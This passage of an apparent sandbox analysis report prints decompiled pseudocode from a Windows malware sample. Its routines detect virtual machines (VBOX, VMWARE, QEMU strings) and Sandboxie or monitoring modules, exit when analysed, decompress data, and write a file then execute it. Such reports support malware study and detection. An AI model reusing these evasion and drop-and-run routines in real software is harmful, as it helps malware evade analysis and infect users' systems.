				_t270 = CreateFileA(_t111, 0, 1, 0, 3, 0, 0);
				_a32 = _t270;
				if(_t270 == 0xffffffff) {
					L24:
					_t117 = 0;
					L25:
					 *[fs:0x0] = _a16124;
					return _t117;
				}
				_a6124 = 0;
				memset( &_a6125, 0, 0x9c3 << 2);
				_t276 = _t276 + 0xc;
				asm("stosw");
				asm("stosb");
				_a40 = 0;
				_a44 = 0;
				_a48 = 0;
				_a28 = 0;
				_a40 = 0;
				_a44 = 0;
				if(DeviceIoControl(_t270, 0x2d1400,  &_a40, 0xc,  &_a6124, 0x2710,  &_a28, 0) == 0) {
					L23:
					CloseHandle(_t270);
					goto L24;
				}
				_a76 = 0;
				memset( &_a77, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_a1076 = 0;
				memset( &_a1077, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_a2076 = 0;
				memset( &_a2077, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_a3076 = 0;
				memset( &_a3077, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_push( &_a2076);
				_push(0);
				_push(_a6136);
				_push( &_a6124);
				E00401780();
				_push( &_a1076);
				_push(0);
				_push(_a6140);
				_push( &_a6124);
				E00401780();
				_push( &_a3076);
				_push(0);
				_push(_a6144);
				_push( &_a6124);
				E00401780();
				_t197 =  &_a76;
				_push(_t197);
				_push(1);
				_push(_a6148);
				_push( &_a6124);
				E00401780();
				_t140 = _a4076;
				_t282 = _t276 + 0x70;
				if(_t140 != 0) {
					L6:
					asm("repne scasb");
					_t199 =  !(_t197 | 0xffffffff);
					_a52 = "VBOX";
					_t266 =  &_a1076 - _t199;
					_t256 =  &_a2076;
					_t231 = _t199;
					_a36 = _t256;
					_a56 = "VMLOG";
					asm("repne scasb");
					_t202 = _t231 >> 2;
					memcpy(_t256 - 1, _t266, _t202 << 2);
					_a60 = "QEMU HARDDISK";
					_a64 = "VMWARE";
					_a68 = "VIRTUAL";
					_a72 = 0;
					_t144 = memcpy(_t266 + _t202 + _t202, _t266, _t231 & 0x00000003);
					_t276 = _t282 + 0x18;
					if("VBOX" != 0) {
						_t207 =  &_a52;
						_t267 = _t144;
						_a8 = _t207;
						do {
							_t145 = CharUpperA(_a36);
							_a12 = _v9;
							_a16 = 0;
							_a20 = 0;
							_a24 = 0;
							asm("repne scasb");
							_push( !(_t207 | 0xffffffff) - 1);
							E00401E11( &_a12, _t145);
							_a16124 = 0;
							_t149 = CharUpperA(_t267);
							_t212 = _v17;
							_v16 = _t212;
							_v12 = 0;
							_v8 = 0;
							_v4 = 0;
							asm("repne scasb");
							_push( !(_t212 | 0xffffffff) - 1);
							E00401E11( &_v16, _t149);
							_t152 = _v20;
							_a16116 = 1;
							if(_v20 == 0) {
								_t152 = 0x403144;
							}
							_t292 = E00401D58( &_a4, _t152, 0, _v8) -  *0x403140; // 0xffffffff
							if(_t292 != 0) {
								_t218 = _v12;
								if(_t218 != 0) {
									_t157 =  *((intOrPtr*)(_t218 - 1));
									if(_t157 == 0 || _t157 == 0xff) {
										E00402020(_t157, _t218 - 1);
										_t276 = _t276 + 4;
									} else {
										 *((char*)(_t218 - 1)) = _t157 - 1;
									}
								}
								_t219 = _a8;
								_v12 = 0;
								_v8 = 0;
								_v4 = 0;
								if(_t219 == 0) {
									L36:
									_t117 = 1;
									goto L25;
								} else {
									_t154 =  *((intOrPtr*)(_t219 - 1));
									if(_t154 == 0 || _t154 == 0xff) {
										E00402020(_t154, _t219 - 1);
										_t276 = _t276 + 4;
										goto L36;
									} else {
										 *((char*)(_t219 - 1)) = _t154 - 1;
										_t117 = 1;
										goto L25;
									}
								}
							}
							_t160 = _v12;
							if(_t160 != 0) {
								_t222 = _t160 - 1;
								_t166 =  *((intOrPtr*)(_t160 - 1));
								if(_t166 == 0 || _t166 == 0xff) {
									E00402020(_t166, _t222);
									_t276 = _t276 + 4;
								} else {
									 *_t222 = _t166 - 1;
								}
							}
							_t207 = _a8;
							_v12 = 0;
							_v8 = 0;
							_v4 = 0;
							_a16124 = 0xffffffff;
							if(_t207 != 0) {
								_t163 =  *(_t207 - 1);
								if(_t163 == 0 || _t163 == 0xff) {
									_t207 = _t207 - 1;
									E00402020(_t163, _t207);
									_t276 = _t276 + 4;
								} else {
									 *(_t207 - 1) = _t163 - 1;
								}
							}
							_a8 = 0;
							_t162 =  &(_v0[1]);
							_a12 = 0;
							_a16 = 0;
							_v0 = _t162;
							_t267 =  *_t162;
						} while (_t267 != 0);
						_t270 = _a24;
					}
					goto L23;
				}
				_t197 = _a76;
				_push(_t197);
				L0040253E();
				_t282 = _t282 + 4;
				if(_t140 != 0) {
					L5:
					_t197 =  &_a4076;
					lstrcpyA(_t197,  &_a76);
					lstrcpyA( &_a5100,  &_a1076);
					goto L6;
				}
				_push(_a95);
				L0040253E();
				_t282 = _t282 + 4;
				if(_t140 == 0) {
					goto L6;
				}
				goto L5;
			}

0x004018f0
0x004018f8
0x00401903
0x0040190a
0x00401913
0x00401918
0x00401930
0x00401933
0x0040194b
0x00401952
0x00401954
0x00401956
0x00401965
0x0040196c
0x0040196c
0x00401973
0x00401979
0x00401980
0x00401985
0x00401989
0x00401ccd
0x00401ccd
0x00401ccf
0x00401cda
0x00401ce7
0x00401ce7
0x0040199d
0x004019a4
0x004019a4
0x004019a6
0x004019a8
0x004019af
0x004019b4
0x004019c0
0x004019d7
0x004019db
0x004019df
0x004019eb
0x00401cc6
0x00401cc7
0x00000000
0x00401cc7
0x004019fc
0x00401a00
0x00401a02
0x00401a04
0x00401a13
0x00401a1a
0x00401a1c
0x00401a1e
0x00401a2d
0x00401a34
0x00401a36
0x00401a38
0x00401a47
0x00401a4e
0x00401a5e
0x00401a60
0x00401a61
0x00401a62
0x00401a6a
0x00401a6b
0x00401a6c
0x00401a7f
0x00401a80
0x00401a88
0x00401a89
0x00401a8a
0x00401a9d
0x00401a9e
0x00401aa6
0x00401aa7
0x00401aa8
0x00401ab4
0x00401abb
0x00401abc
0x00401ac5
0x00401ac6
0x00401ac7
0x00401acc
0x00401ad3
0x00401ad8
0x00401b25
0x00401b38
0x00401b3a
0x00401b3e
0x00401b46
0x00401b48
0x00401b4a
0x00401b4c
0x00401b53
0x00401b5b
0x00401b60
0x00401b63
0x00401b6f
0x00401b79
0x00401b81
0x00401b89
0x00401b8d
0x00401b8d
0x00401b8f
0x00401b9b
0x00401b9f
0x00401ba1
0x00401ba5
0x00401baa
0x00401bb2
0x00401bbd
0x00401bc1
0x00401bc5
0x00401bc9
0x00401bce
0x00401bd4
0x00401bda
0x00401be1
0x00401be3
0x00401be9
0x00401bf4
0x00401bf8
0x00401bfc
0x00401c00
0x00401c05
0x00401c0b
0x00401c10
0x00401c14
0x00401c1e
0x00401c20
0x00401c20
0x00401c35
0x00401c3b
0x00401ce8
0x00401cee
0x00401cf0
0x00401cf5
0x00401d04
0x00401d09
0x00401cfb
0x00401cfd
0x00401cfd
0x00401cf5
0x00401d0c
0x00401d10
0x00401d16
0x00401d1a
0x00401d1e
0x00401d41
0x00401d41
0x00000000
0x00401d20
0x00401d20
0x00401d25
0x00401d39
0x00401d3e
0x00000000
0x00401d2b
0x00401d2d
0x00401d30
0x00000000
0x00401d30
0x00401d25
0x00401d1e
0x00401c41
0x00401c47
0x00401c49
0x00401c4c
0x00401c51
0x00401c5e
0x00401c63
0x00401c57
0x00401c59
0x00401c59
0x00401c51
0x00401c66
0x00401c6a
0x00401c70
0x00401c74
0x00401c78
0x00401c83
0x00401c85
0x00401c8a
0x00401c97
0x00401c99
0x00401c9e
0x00401c90
0x00401c92
0x00401c92
0x00401c8a
0x00401ca5
0x00401ca9
0x00401cac
0x00401cb0
0x00401cb4
0x00401cb8
0x00401cba
0x00401cc2
0x00401cc2
0x00000000
0x00401b8f
0x00401ada
0x00401adf
0x00401ae0
0x00401ae5
0x00401aea
0x00401afe
0x00401b08
0x00401b11
0x00401b23
0x00000000
0x00401b23
0x00401af1
0x00401af2
0x00401af7
0x00401afc
0x00000000
0x00000000
0x00000000

APIs

??2@YAPAXI@Z.MSVCRT ref: 00401918
lstrcatA.KERNEL32(\\.\,00000000,00000000), ref: 00401933
CreateFileA.KERNEL32(00000000,00000000,00000001,00000000,00000003,00000000,00000000), ref: 0040197A
DeviceIoControl.KERNEL32 ref: 004019E3
CloseHandle.KERNEL32(00000000), ref: 00401CC7

Part of subcall function 00401780: tolower.MSVCRT ref: 004017BC
Part of subcall function 00401780: isspace.MSVCRT ref: 004017C7
Part of subcall function 00401780: isprint.MSVCRT ref: 0040181D
Part of subcall function 00401780: isprint.MSVCRT ref: 0040184A

Part of subcall function 00401780: isspace.MSVCRT ref: 0040189E

isalnum.MSVCRT ref: 00401AE0
isalnum.MSVCRT ref: 00401AF2
lstrcpyA.KERNEL32(?,?), ref: 00401B11
lstrcpyA.KERNEL32(?,?), ref: 00401B23
CharUpperA.USER32(?), ref: 00401BAA
CharUpperA.USER32(VBOX,00000000), ref: 00401BE1

Strings

VIRTUAL, xrefs: 00401B81
QEMU HARDDISK, xrefs: 00401B6F
\\.\, xrefs: 0040192B
pA@, xrefs: 00401B9B
VMLOG, xrefs: 00401B53
VBOX, xrefs: 00401B3E, 00401B67, 00401BD9
VMWARE, xrefs: 00401B79

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CharUpperisalnumisprintisspacelstrcpy$??2@CloseControlCreateDeviceFileHandlelstrcattolower
String ID: QEMU HARDDISK$VBOX$VIRTUAL$VMLOG$VMWARE$\\.\$pA@
API String ID: 1627761574-3870764142
Opcode ID: 33faca869b1228ff1db31fe669dc65e4cebe09eedcf4918cc4a248543a3d5d0c
Instruction ID: f7bbc1d95ebeef848e1b9314e67cabb8d9d8d46cba94e09741ee6c638e1bbe28
Opcode Fuzzy Hash: 33faca869b1228ff1db31fe669dc65e4cebe09eedcf4918cc4a248543a3d5d0c
Instruction Fuzzy Hash: FDC1C4B15483809FD321DF28C884AABBBE5FBC8344F04493EF58597391DB799909CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004011C7, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004011C7(char* _a4, void* _a8, long _a12, int _a16, long _a20) {
				void* _v8;
				void _v267;
				char _v268;
				void* _t26;
				void* _t34;
				signed int _t36;

				_t36 = 0x40;
				_v268 = 0;
				memset( &_v267, 0, _t36 << 2);
				asm("stosw");
				asm("stosb");
				PathCombineA( &_v268, _a4, _a20);
				SetFileAttributesA( &_v268, 0x80);
				_t26 = CreateFileA( &_v268, 0xc0000000, 0, 0, 2, 2, 0);
				_v8 = _t26;
				if(_t26 != 0xffffffff) {
					_a20 = 0;
					WriteFile(_t26, _a8, _a12,  &_a20, 0);
					CloseHandle(_v8);
					SetFileAttributesA( &_v268, 0x80);
					ShellExecuteA(0, "open",  &_v268, 0, _a4, _a16);
					return 0;
				}
				_t34 = 1;
				return _t34;
			}

0x004011d7
0x004011e0
0x004011e9
0x004011ee
0x004011f0
0x004011f8
0x00401211
0x00401226
0x0040122f
0x00401232
0x0040123e
0x00401248
0x00401251
0x0040125f
0x00401275
0x00000000
0x0040127b
0x00401236
0x00000000

APIs

PathCombineA.SHLWAPI(?,?,?,00000000,0000000A,00000000), ref: 004011F8
SetFileAttributesA.KERNEL32(?,00000080), ref: 00401211
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000002,00000000), ref: 00401226
WriteFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00401248
CloseHandle.KERNEL32(00000000), ref: 00401251
SetFileAttributesA.KERNEL32(?,00000080), ref: 0040125F
ShellExecuteA.SHELL32(00000000,open,?,00000000,?,00000000), ref: 00401275

Strings

open, xrefs: 0040126F

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File$Attributes$CloseCombineCreateExecuteHandlePathShellWrite
String ID: open
API String ID: 1472231245-2758837156
Opcode ID: d01971f85050b2bd80bd06c3548902baed33adc4ebeccf73ed0968f4278b9edc
Instruction ID: b4015b20fa4fca804e27d42f60213ba64d5324a88e2f1d86366d15d87e0c8716
Opcode Fuzzy Hash: d01971f85050b2bd80bd06c3548902baed33adc4ebeccf73ed0968f4278b9edc
Instruction Fuzzy Hash: 8C117F7690411CBFDF209FA4DC49FDB7F3CEB58355F1044A6B644B6090DAB09A94CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401FB0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,00401468,?,00000000,?,?,00000000), ref: 00401FBC
GetModuleHandleA.KERNEL32(cwmonitor,?,?,00000000), ref: 00401FC7

Part of subcall function 004018F0: ??2@YAPAXI@Z.MSVCRT ref: 00401918
Part of subcall function 004018F0: lstrcatA.KERNEL32(\\.\,00000000,00000000), ref: 00401933
Part of subcall function 004018F0: CreateFileA.KERNEL32(00000000,00000000,00000001,00000000,00000003,00000000,00000000), ref: 0040197A
Part of subcall function 004018F0: DeviceIoControl.KERNEL32 ref: 004019E3

GetCurrentProcess.KERNEL32(?), ref: 00401FF8
GetExitCodeProcess.KERNEL32 ref: 00401FFF
ExitProcess.KERNEL32 ref: 0040200A

Strings

SbieDll.dll, xrefs: 00401FB7
cwmonitor, xrefs: 00401FC2

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$ExitHandleModule$??2@CodeControlCreateCurrentDeviceFilelstrcat
String ID: SbieDll.dll$cwmonitor
API String ID: 2873962589-660256926
Opcode ID: a28dba3c993dac8c11d89181751d8fa46ed5160c231e9f978fffd031d7e6ce52
Instruction ID: d36f33c544cb0304d64de2c0d66ad9c24a886837219df4edc0b74a4667214583
Opcode Fuzzy Hash: a28dba3c993dac8c11d89181751d8fa46ed5160c231e9f978fffd031d7e6ce52
Instruction Fuzzy Hash: B0F0B471205301AFD7109BB19D08B1B7B9D9F98350F00883AF905F3294E638D5408B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040202B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040202B(void* __eflags) {
				intOrPtr* _t38;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;

				L00402586();
				 *((char*)(_t50 - 0x20)) =  *((intOrPtr*)(_t50 - 0xd));
				E00401DD5(_t50 - 0x20, 0);
				_push(strlen("string too long"));
				E00401E11(_t50 - 0x20, "string too long");
				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
				_push(_t50 - 0x20);
				_t8 = _t50 - 0x3c; // 0x7742ff34
				_t38 = _t8;
				L1();
				_t9 = _t50 - 0x3c; // 0x7742ff34
				_push(0x403408);
				 *((intOrPtr*)(_t50 - 0x3c)) = 0x40314c;
				L00402718();
				_t47 = _t9;
				L00402586();
				_push(_t38);
				_push(_t38);
				_push(_t47);
				_t11 = _t50 - 0x10; // 0x7742ff60
				_t48 = _t38;
				 *((intOrPtr*)(_t50 - 0x14)) = _t48;
				 *((intOrPtr*)(_t50 - 0x10)) = 0x403178;
				L00402724();
				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
				 *((char*)(_t48 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t50 + 8))));
				E00401DD5(_t48 + 0xc, 0);
				E0040233F(_t48 + 0xc,  *((intOrPtr*)(_t50 + 8)), 0,  *0x403140);
				 *_t48 = "P!@";
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t48;
			}

0x00402030
0x00402041
0x00402044
0x00402055
0x0040205a
0x0040205f
0x00402066
0x00402067
0x00402067
0x0040206a
0x0040206f
0x00402072
0x00402078
0x0040207f
0x00402084
0x0040208a
0x0040208f
0x00402090
0x00402092
0x00402093
0x00402097
0x0040209a
0x0040209d
0x004020a4
0x004020ac
0x004020b9
0x004020bb
0x004020cb
0x004020d3
0x004020de
0x004020e6

APIs

_EH_prolog.MSVCRT ref: 00402030
strlen.MSVCRT ref: 0040204F

Part of subcall function 00402085: _EH_prolog.MSVCRT ref: 0040208A
Part of subcall function 00402085: ??0exception@@QAE@ABQBD@Z.MSVCRT(7742FF60), ref: 004020A4

_CxxThrowException.MSVCRT(7742FF34,00403408), ref: 0040207F

Strings

#"@, xrefs: 00402078
string too long, xrefs: 00402049, 0040204E, 00402056

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$??0exception@@ExceptionThrowstrlen
String ID: #"@$string too long
API String ID: 4056035191-3599617215
Opcode ID: e60be865f8ec7b7ae14d07182f2a0b6904e8344d65be8e5466d0567450979c3b
Instruction ID: 0549bc370ae89a891f7e020882ed10ef815c1ceddb4a43e9484f7fb274972932
Opcode Fuzzy Hash: e60be865f8ec7b7ae14d07182f2a0b6904e8344d65be8e5466d0567450979c3b
Instruction Fuzzy Hash: F9F03A32C01118BADB04FBA5DD4AADD7B7CAF18315F00402AF500760D2DBBC16088BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401000(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				signed int _v8;
				_Unknown_base(*)()* _t10;
				void* _t15;
				void* _t16;
				intOrPtr* _t18;

				L004024E8();
				_v8 = _v8 & 0x00000000;
				_t16 = __eax;
				 *_t18 = "Ntdll.dll";
				_t10 = GetProcAddress(GetModuleHandleA(_a12), "RtlDecompressBuffer");
				 *_t10(0x102, _t16, _a12, _a4, _a8,  &_v8, _t15, __ecx);
				return _t16;
			}

0x00401008
0x0040100d
0x00401011
0x00401013
0x00401026
0x0040103f
0x00401045

APIs

??2@YAPAXI@Z.MSVCRT ref: 00401008
GetModuleHandleA.KERNEL32(00000000,00000000,?,?,00401548,004026C0,0000000A,00000000), ref: 0040101A
GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 00401026

Strings

Ntdll.dll, xrefs: 00401013
RtlDecompressBuffer, xrefs: 00401020

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ??2@AddressHandleModuleProc
String ID: Ntdll.dll$RtlDecompressBuffer
API String ID: 249543258-662685767
Opcode ID: 3dca89544e95365f7c93d4f47a82e50c426048ecd1685e33f384c8bc7426d852
Instruction ID: 60d32bc2359c1cf861c5b92dec8c4ac14946f991e5bf7565adabb2dee558510e
Opcode Fuzzy Hash: 3dca89544e95365f7c93d4f47a82e50c426048ecd1685e33f384c8bc7426d852
Instruction Fuzzy Hash: 39E06D72501218BFCF005FD4DD09EDE7E6CEB04352F004028F704A20D0D6B59A10DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401780, Relevance: 7.6, APIs: 5, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00401780() {
				intOrPtr _t28;
				signed int _t29;
				void* _t30;
				intOrPtr _t32;
				signed int _t34;
				char* _t36;
				void* _t37;
				signed int _t40;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed char _t47;
				char _t49;
				void* _t55;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr* _t65;
				signed int _t67;
				signed int _t68;
				void* _t71;

				_t28 =  *((intOrPtr*)(_t71 + 8));
				_t65 =  *((intOrPtr*)(_t71 + 0x14));
				 *_t65 = 0;
				if(_t28 > 0) {
					_push(_t43);
					_t62 = 0;
					_t29 = _t28 +  *((intOrPtr*)(_t71 + 8));
					 *((char*)(_t71 + 0x20)) = 0;
					 *_t65 = 0;
					 *(_t71 + 0x18) = _t29;
					_t67 = _t29;
					while(1) {
						_t30 =  *_t67;
						if(_t30 == 0) {
							break;
						}
						_push(_t30);
						L00402538();
						_t46 = _t30;
						_t37 = _t46;
						_push(_t37);
						L00402532();
						_t71 = _t71 + 8;
						if(_t37 != 0) {
							_t46 = 0x30;
						}
						_t59 =  *(_t62 + _t65) << 4;
						 *((char*)(_t71 + 0x20)) =  *((intOrPtr*)(_t71 + 0x20)) + 1;
						 *(_t62 + _t65) = _t59;
						_t40 = _t59;
						if(_t46 < 0x30 || _t46 > 0x39) {
							if(_t46 < 0x61 || _t46 > 0x66) {
								goto L17;
							} else {
								_t47 = _t46 - 0x57;
								goto L12;
							}
						} else {
							_t47 = _t46 - 0x30;
							L12:
							_t43 = _t47 | _t40;
							 *(_t62 + _t65) = _t43;
							if( *((intOrPtr*)(_t71 + 0x20)) != 2) {
								L16:
								_t67 = _t67 + 1;
								continue;
							} else {
								_t40 = _t43;
								if(_t40 == 0) {
									L15:
									_t62 = _t62 + 1;
									 *((char*)(_t71 + 0x20)) = 0;
									 *(_t62 + _t65) = 0;
									goto L16;
								} else {
									_push(_t40);
									L0040252C();
									_t71 = _t71 + 4;
									if(_t40 == 0) {
										L17:
										_t67 =  *(_t71 + 0x18);
										_t62 = 0;
										while(1) {
											_t43 =  *_t67;
											if(_t43 == 0) {
												goto L22;
											}
											_push(_t43);
											L0040252C();
											_t71 = _t71 + 4;
											if(_t40 == 0) {
												_t62 = 0;
											} else {
												 *(_t62 + _t65) = _t43;
												_t62 = _t62 + 1;
												_t67 = _t67 + 1;
												continue;
											}
											goto L22;
										}
									} else {
										goto L15;
									}
								}
							}
						}
						break;
					}
					L22:
					 *(_t62 + _t65) = 0;
					if( *((intOrPtr*)(_t71 + 0x1c)) != 0 && _t62 > 0) {
						_t18 = _t65 + 1; // 0x74b04de1
						_t36 = _t18;
						_t67 = (_t67 | 0xffffffff) - _t65;
						do {
							 *((char*)(_t36 - 1)) =  *_t36;
							 *_t36 =  *((intOrPtr*)(_t36 - 1));
							_t36 = _t36 + 2;
						} while (_t36 + _t67 < _t62);
					}
					_t32 =  *_t65;
					_t68 = _t67 | 0xffffffff;
					_t44 = _t43 | 0xffffffff;
					_t63 = 0;
					if(_t32 != 0) {
						do {
							_push( *((char*)(_t63 + _t65)));
							L00402532();
							_t71 = _t71 + 4;
							if(_t32 == 0) {
								if(_t44 < 0) {
									_t44 = _t63;
								}
								_t68 = _t63;
							}
							_t32 =  *((intOrPtr*)(_t63 + _t65 + 1));
							_t63 = _t63 + 1;
						} while (_t32 != 0);
						if(_t44 >= 0 && _t68 >= 0) {
							_t34 = _t44;
							if(_t44 <= _t68) {
								while(1) {
									_t49 =  *((intOrPtr*)(_t34 + _t65));
									if(_t49 == 0) {
										goto L37;
									}
									_t55 = _t34 - _t44;
									_t34 = _t34 + 1;
									 *((char*)(_t55 + _t65)) = _t49;
									if(_t34 <= _t68) {
										continue;
									}
									goto L37;
								}
							}
							L37:
							 *((char*)(_t34 - _t44 + _t65)) = 0;
						}
					}
					return _t65;
				} else {
					return _t65;
				}
			}

0x00401780
0x00401785
0x0040178b
0x0040178e
0x00401798
0x0040179b
0x0040179d
0x0040179f
0x004017a4
0x004017a7
0x004017ab
0x004017ad
0x004017ad
0x004017b2
0x00000000
0x00000000
0x004017bb
0x004017bc
0x004017c1
0x004017c3
0x004017c6
0x004017c7
0x004017cc
0x004017d1
0x004017d3
0x004017d3
0x004017de
0x004017e1
0x004017e8
0x004017eb
0x004017ed
0x004017fc
0x00000000
0x00401803
0x00401803
0x00000000
0x00401803
0x004017f4
0x004017f4
0x00401806
0x00401806
0x0040180e
0x00401811
0x00401833
0x00401833
0x00000000
0x00401813
0x00401813
0x00401817
0x00401829
0x00401829
0x0040182a
0x0040182f
0x00000000
0x00401819
0x0040181c
0x0040181d
0x00401822
0x00401827
0x00401839
0x00401839
0x0040183d
0x0040183f
0x0040183f
0x00401844
0x00000000
0x00000000
0x00401849
0x0040184a
0x0040184f
0x00401854
0x0040185d
0x00401856
0x00401856
0x00401859
0x0040185a
0x00000000
0x0040185a
0x00000000
0x00401854
0x00000000
0x00000000
0x00000000
0x00401827
0x00401817
0x00401811
0x00000000
0x004017ed
0x0040185f
0x00401863
0x00401869
0x00401872
0x00401872
0x00401875
0x00401877
0x0040187c
0x0040187f
0x00401881
0x00401887
0x00401877
0x0040188b
0x0040188d
0x00401890
0x00401893
0x00401897
0x00401899
0x0040189d
0x0040189e
0x004018a3
0x004018a8
0x004018ac
0x004018ae
0x004018ae
0x004018b0
0x004018b0
0x004018b2
0x004018b6
0x004018b7
0x004018bd
0x004018c5
0x004018c7
0x004018c9
0x004018c9
0x004018ce
0x00000000
0x00000000
0x004018d2
0x004018d4
0x004018d7
0x004018da
0x00000000
0x00000000
0x00000000
0x004018da
0x004018c9
0x004018dc
0x004018de
0x004018de
0x004018bd
0x004018e8
0x00401790
0x00401793
0x00401793

APIs

tolower.MSVCRT ref: 004017BC
isspace.MSVCRT ref: 004017C7
isprint.MSVCRT ref: 0040181D
isprint.MSVCRT ref: 0040184A

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: isprint$isspacetolower
String ID:
API String ID: 2460042518-0
Opcode ID: e4abda3298a20bb397b6b220ad2c58c192e12379a4a9e408834b4ba2f888c67d
Instruction ID: 82dc739f2192569af9c7a9653aceb93c5fda12627ae8ebc29f7d26932d665028
Opcode Fuzzy Hash: e4abda3298a20bb397b6b220ad2c58c192e12379a4a9e408834b4ba2f888c67d
Instruction Fuzzy Hash: 844125166087C15DE3116A3D48503A7BBD91F92308F5C417ED8D0A73E3E67ECA09C36A

Uniqueness

Uniqueness Score: -1.00%

Function 00402085, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402085(char** __ecx) {
				void* _t28;

				L00402586();
				_push(__ecx);
				_push(__ecx);
				_t1 = _t28 - 0x10; // 0x7742ff60
				 *((intOrPtr*)(_t28 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t28 - 0x10)) = 0x403178;
				L00402724();
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				__ecx[3] =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8))));
				E00401DD5( &(__ecx[3]), 0);
				E0040233F( &(__ecx[3]),  *((intOrPtr*)(_t28 + 8)), 0,  *0x403140);
				 *__ecx = "P!@";
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return __ecx;
			}

0x0040208a
0x0040208f
0x00402090
0x00402093
0x0040209a
0x0040209d
0x004020a4
0x004020ac
0x004020b9
0x004020bb
0x004020cb
0x004020d3
0x004020de
0x004020e6

APIs

_EH_prolog.MSVCRT ref: 0040208A
??0exception@@QAE@ABQBD@Z.MSVCRT(7742FF60), ref: 004020A4

Strings

P!@, xrefs: 004020D3
string too long, xrefs: 00402092

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ??0exception@@H_prolog
String ID: P!@$string too long
API String ID: 131831681-3885184578
Opcode ID: 4b332946c1271456af2096fca9a8cc99132634d38232edc61a83a3940f93435c
Instruction ID: 5f35b383997495e749a4d8b1929ec4d776141fec34b867eb11734b74fbb16bf0
Opcode Fuzzy Hash: 4b332946c1271456af2096fca9a8cc99132634d38232edc61a83a3940f93435c
Instruction Fuzzy Hash: 3AF0AF71600210AAC7009F598805BAEBBBCEB88705F00402FE141BB2C1C7F85A048768

Uniqueness

Uniqueness Score: -1.00%

Function 00402257, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00402257(void* __eflags) {
				void* _t27;
				intOrPtr* _t31;
				intOrPtr* _t38;
				void* _t40;

				L00402586();
				 *((char*)(_t40 - 0x20)) =  *((intOrPtr*)(_t40 - 0xd));
				E00401DD5(_t40 - 0x20, 0);
				_push(strlen("invalid string position"));
				E00401E11(_t40 - 0x20, "invalid string position");
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t31 = _t40 - 0x3c;
				E00402085(_t31, _t40 - 0x20);
				_push(0x403530);
				_push(_t40 - 0x3c);
				 *((intOrPtr*)(_t40 - 0x3c)) = 0x403180;
				L00402718();
				_pop(_t37);
				L00402586();
				_push(_t31);
				_t38 = _t31;
				 *((intOrPtr*)(_t40 - 0x10)) = _t38;
				 *_t38 = "P!@";
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t27 = E00401DD5(_t38 + 0xc, 1);
				 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
				L0040271E();
				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
				return _t27;
			}

0x0040225c
0x0040226d
0x00402270
0x00402281
0x00402286
0x0040228b
0x00402293
0x00402296
0x0040229e
0x004022a3
0x004022a4
0x004022ab
0x004022b0
0x004022b6
0x004022bb
0x004022bd
0x004022bf
0x004022c2
0x004022c8
0x004022d1
0x004022d6
0x004022dc
0x004022e5
0x004022ed

APIs

_EH_prolog.MSVCRT ref: 0040225C
strlen.MSVCRT ref: 0040227B

Part of subcall function 00402085: _EH_prolog.MSVCRT ref: 0040208A
Part of subcall function 00402085: ??0exception@@QAE@ABQBD@Z.MSVCRT(7742FF60), ref: 004020A4

_CxxThrowException.MSVCRT(00000000,00403530), ref: 004022AB

Strings

invalid string position, xrefs: 00402275, 0040227A, 00402282

Memory Dump Source

